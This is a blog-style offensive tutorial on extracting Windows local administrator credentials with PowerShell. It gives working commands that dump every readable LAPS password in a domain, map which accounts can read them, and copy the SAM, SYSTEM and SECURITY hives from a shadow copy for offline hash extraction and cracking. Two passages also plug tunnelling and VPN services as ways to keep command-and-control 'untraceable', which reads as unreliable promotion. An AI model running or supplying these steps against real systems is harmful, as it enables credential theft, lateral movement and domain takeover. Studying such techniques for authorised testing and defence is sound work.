Automating Local Administrator Password Discovery for Privilege Escalation with PowerShell
Local administrator accounts are a persistent vector for privilege escalation on Windows networks. Their mismanagement often provides an avenue for lateral movement and full domain compromise. Automating the discovery of these passwords, particularly in environments leveraging solutions like Local Administrator Password Solution (LAPS), significantly reduces the time to escalate privileges, turning a laborious manual hunt into a swift, programmatic extraction. This post details the reconnaissance and exploitation techniques using PowerShell to discover local administrator passwords for immediate privilege escalation.Initial Reconnaissance: Identifying Targets and LAPS Deployment
Before attempting to discover passwords, identifying potential targets and verifying the presence of LAPS is crucial. LAPS is designed to mitigate the threat of compromised local administrator accounts by unique, randomly generated passwords for each machine, stored securely in Active Directory. Its deployment, however, often provides an attacker with a centralized point to query these passwords, given the right permissions.Active Directory Enumeration for LAPS Presence
The first step is to enumerate Active Directory (AD) for attributes related to LAPS. We look for the `ms-Mcs-AdmPwd` attribute, which stores the password, and `ms-Mcs-AdmPwdExpirationTime`, which indicates when the password will change. The absence of these attributes on computer objects suggests LAPS is not deployed or not configured for those specific objects.A simple PowerShell one-liner can query a domain controller for computer objects possessing the LAPS attributes. This helps to confirm LAPS deployment and identify the scope of its use across the environment.
Get-ADComputer -Filter 'ms-Mcs-AdmPwd -like "*"' -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime | Select-Object Name, ms-Mcs-AdmPwdExpirationTime, @{N='LAPS Password'; E={$_.'ms-Mcs-AdmPwd'}}
This command returns a list of computer names, their LAPS password expiration times, and the LAPS password itself, assuming the executing user has the necessary read permissions on the `ms-Mcs-AdmPwd` attribute.
Local Administrator Password Solution (LAPS) Exploitation
LAPS is a powerful tool for defenders, but if an attacker gains control of an account with elevated privileges, or exploits a misconfiguration, it becomes a goldmine. The critical aspect of LAPS exploitation is understanding and leveraging the permissions model.Understanding LAPS Permissions
By default, only the computer object itself and Domain Administrators can read the LAPS password attribute. However, delegated permissions are common. Service accounts, help desk personnel, or specific administrative groups are often granted explicit `Read-Property` access to the `ms-Mcs-AdmPwd` attribute on OUs containing computer objects. Our goal is to identify these accounts or compromise one that already possesses this permission.To determine which users or groups have read access to LAPS passwords on computer objects within a specific Organizational Unit (OU), we can inspect the Access Control Lists (ACLs). This often requires `ActiveDirectory` module and appropriate permissions to read security descriptors.
Get-ADObject -Identity "OU=Workstations,DC=contoso,DC=com" -Properties nTSecurityDescriptor | Select-Object -ExpandProperty nTSecurityDescriptor | ForEach-Object {
$_.Access | Where-Object { $_.ActiveDirectoryRights -match "ReadProperty" -and $_.ObjectType -eq (Get-ADSchemaAttribute ms-Mcs-AdmPwd).SchemaGuid.Guid } | Select-Object IdentityReference, ActiveDirectoryRights, AccessControlType, IsInherited
}
This script attempts to list entities with specific read rights on the LAPS attribute within a given OU. Identifying accounts with these permissions is a direct path to password discovery.
Querying LAPS Passwords with Existing Permissions
Once an account with read access to the `ms-Mcs-AdmPwd` attribute is identified or compromised, retrieving the passwords becomes straightforward. The `Get-ADComputer` cmdlet, as shown previously, is the primary tool. An attacker using this method can quickly enumerate all local administrator passwords for machines within their scope. This information is invaluable for lateral movement, especially when combined with tools like GProxy to tunnel traffic and maintain stealth during the subsequent phases of the engagement, ensuring command-and-control communication remains secure and untraceable.
# Assuming current user has read permissions on ms-Mcs-AdmPwd attribute
# To get all LAPS passwords for all computers in the domain:
Get-ADComputer -Filter 'ms-Mcs-AdmPwd -like "*"' -Properties Name, ms-Mcs-AdmPwd | Select-Object Name, @{N='LAPS_Password'; E={$_.'ms-Mcs-AdmPwd'}} | Format-Table -AutoSize
# To get the LAPS password for a specific computer:
(Get-ADComputer -Identity "TargetPC01" -Properties ms-Mcs-AdmPwd).'ms-Mcs-AdmPwd'
The output of these commands will be the actual LAPS-managed local administrator passwords. This represents a significant privilege escalation, as an attacker can now authenticate as a local administrator on any target machine for which they retrieved the password. Establishing a secure connection for follow-up actions can be crucial, and services like VPNWG are often utilized by pentesters to ensure their traffic is encrypted and routed securely, protecting against eavesdropping or detection while moving laterally.
Name LAPS_Password
---- -------------
SERVER01 P@$$w0rd123!
CLIENT05 LapsP@$$W0rd!
HOST_HR AdminPass_01
...
This output immediately provides credentials for lateral movement. The `Format-Table -AutoSize` ensures readable output, but for scripting, the raw `Select-Object` output can be piped to `Export-Csv` or similar for programmatic use.
Alternative Discovery: SAM Hashing and Offline Attacks
While LAPS is the most efficient target for automated discovery in AD-integrated environments, situations exist where LAPS is not deployed, or a different initial foothold (e.g., physical access, unprivileged file system access) allows for alternative password discovery methods. One such method involves dumping the Security Account Manager (SAM) database.Dumping SAM Hashes
The SAM database stores local user account passwords in a hashed format. Accessing this database directly is usually protected, but techniques exist to bypass these protections. These often involve leveraging Volume Shadow Copy Service (VSS) or exploiting vulnerabilities that allow reading protected system files.One common method involves creating a shadow copy of the system drive and then extracting the `SAM`, `SYSTEM`, and `SECURITY` registry hives. These hives, when combined, allow for the extraction of NTLM hashes for local accounts using external tools.
# Create a shadow copy
$drive = Get-WmiObject Win32_Volume -Filter "DriveLetter='C:'"
$shadow = ([wmiclass]"Win32_ShadowCopy").Create($drive.DeviceId, "ClientAccessible").ShadowCopyID
# Mount the shadow copy (optional, but useful for direct access)
$shadowCopyObj = Get-WmiObject Win32_ShadowCopy | Where-Object {$_.ID -eq $shadow}
$shadowPath = $shadowCopyObj.DeviceObject
# Copy the registry hives from the shadow copy
Copy-Item "$shadowPath\Windows\System32\config\SAM" "C:\Temp\SAM"
Copy-Item "$shadowPath\Windows\System32\config\SYSTEM" "C:\Temp\SYSTEM"
Copy-Item "$shadowPath\Windows\System32\config\SECURITY" "C:\Temp\SECURITY"
# Delete the shadow copy
# (Get-WmiObject Win32_ShadowCopy -Filter "ID='$shadow'").Delete()
Write-Host "SAM, SYSTEM, and SECURITY hives copied to C:\Temp\"
Write-Host "Use an external tool like secretsdump.py to extract hashes."
This PowerShell script facilitates the copying of critical registry hives. Once these files are obtained, an attacker can move them to an offline system for hash extraction and cracking using tools like `Impacket's secretsdump.py` or `Mimikatz`. This method, however, typically requires administrative privileges or highly specific misconfigurations to execute the shadow copy operation and copy protected files.
Cracking Hashes
Once the NTLM hashes for local administrator accounts are extracted from the SAM database (e.g., `Administrator::1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::`) they can be fed into password cracking tools such as Hashcat or John the Ripper. Offline cracking is significantly faster and safer than online brute-forcing, as it doesn't risk account lockouts or trigger security alerts. The success rate depends heavily on password complexity and the strength of the cracking rig and wordlists.The automation here lies in the script's ability to swiftly collect the necessary files. The subsequent cracking phase is an offline process, but without the initial automated discovery of the hashes, it wouldn't be possible.